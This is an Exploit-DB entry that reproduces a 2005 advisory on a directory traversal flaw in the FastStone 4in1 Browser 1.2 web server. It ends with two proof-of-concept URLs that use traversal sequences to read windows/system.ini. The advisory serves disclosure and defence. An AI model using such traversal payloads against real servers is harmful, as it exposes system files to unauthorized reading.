FastStone 4in1 Browser 1.2 - Web Server Directory Traversal

EDB-ID:

25319




Platform:

Windows

Date:

2005-03-29


source: https://www.securityfocus.com/bid/12937/info

A vulnerability has been identified in the handling of certain types of requests by the 4in1 Browser Web server. Because of this, it is possible for an attacker to gain access to potentially sensitive system files.

This issue could be exploited to gain read access to files on a host using the vulnerable software. Read privileges granted to these files would be restricted by the permissions of the web server process.

This vulnerability is reported to affect FastStone 4in1 Browser version 1.2, previous versions might also be affected. 

http://www.example.com/.../.../.../.../.../.../windows/system.ini
http://www.example.com/..\..\..\..\..\..\..\..\windows/system.ini